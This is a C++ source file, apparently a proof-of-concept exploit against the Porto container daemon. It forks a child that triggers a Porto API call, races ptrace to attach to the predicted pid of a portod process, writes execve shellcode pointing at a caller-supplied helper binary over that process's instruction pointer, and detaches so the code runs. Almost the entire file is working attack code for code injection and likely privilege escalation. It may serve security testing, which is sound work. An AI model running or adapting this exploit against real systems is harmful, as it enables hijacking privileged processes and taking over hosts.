#include <cerrno>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/user.h>
#include <sys/mman.h>

#include <infra/porto/api/libporto.hpp>


void* alloc_executable_memory(size_t size) {
    void* ptr = mmap(nullptr, size,
                     PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (ptr == (void*) -1) {
        perror("mmap");
        return nullptr;
    }
    return ptr;
}

TString gen_shellcode(const TString& helperPath) {
    TStringBuf shell_tmpl(
        "\x31\xc0\x50\x48\x8b\x14\x24\xeb\x10\x54"
        "\x78\x06\x5e\x5f\xb0\x3b\x0f\x05\x59\x5b"
        "\x40\xb0\x0b\xcd\x80\xe8\xeb\xff\xff\xff"sv);

    return shell_tmpl + helperPath;
}

int inject_data(pid_t pid, unsigned char* src, void* dst, size_t len) {
    auto* s = (uint32_t*) src;
    auto* d = (uint32_t*) dst;

    for (size_t i = 0; i < len; i += 4, s++, d++) {
        if ((ptrace(PTRACE_POKETEXT, pid, d, *s)) < 0) {
            Cerr << "ptrace(POKETEXT):" << strerror(errno) << Endl;
            return -1;
        }
    }

    return 0;
}

int attack(const TString& helperPath, int targetPid) {
    Cout << "Tracing process " << targetPid << Endl;

    while (true) {
        auto success = (ptrace(PTRACE_ATTACH, targetPid, nullptr, nullptr)) == 0;
        if (!success) {
            if (errno == ESRCH) {
                continue;
            }

            Cerr << "ptrace(ATTACH):" << strerror(errno) << Endl;
            _exit(1);

        }
        break;
    }

    Cout << "Waiting for process" << Endl;
    auto tid = wait(nullptr);

    Cout << "Getting Registers" << Endl;
    struct user_regs_struct regs{};
    if ((ptrace(PTRACE_GETREGS, tid, nullptr, &regs)) < 0) {
        Cerr << "ptrace(GETREGS):" << strerror(errno) << Endl;
        _exit(1);
    }

    auto shell_code = gen_shellcode(helperPath);
    auto shell_code_ptr = static_cast<unsigned char*>(alloc_executable_memory(shell_code.size()));
    memcpy(shell_code_ptr, shell_code.data(), shell_code.size());

    Cout << "Injecting shell code at " << (void*) regs.rip << Endl;
    if (inject_data(tid, shell_code_ptr, (void*) regs.rip, shell_code.size())) {
        _exit(1);
    }

    Cout << "Setting instruction pointer to " << (void*) regs.rip << Endl;
    if ((ptrace(PTRACE_SETREGS, tid, nullptr, &regs)) < 0) {
        Cerr << "ptrace(GETREGS):" << strerror(errno) << Endl;
        _exit(1);
    }

    Cout << "Run it" << Endl;
    if ((ptrace(PTRACE_DETACH, tid, nullptr, nullptr)) < 0) {
        Cerr << "ptrace(DETACH):" << strerror(errno) << Endl;
        _exit(1);
    }
    return 0;
}

int main(int argc, char** argv) {
    if (argc < 2) {
        Cerr << "Usage: " << argv[0] << " /path/to/helper" << Endl;
        return 1;
    }

    TString helperPath = argv[1];
    int targetPid = getpid() + 2;
    Cout << "Wait for portod with pid " << targetPid << Endl;
    int pid = fork();
    if (pid > 0) {
        attack(helperPath, targetPid);
        _exit(0);
    } else {
        Porto::TPortoApi api;
        TString _ = "";
        Y_UNUSED(api.LocateProcess(getpid(), _, _));
    }

    waitpid(pid, nullptr, 0);
}
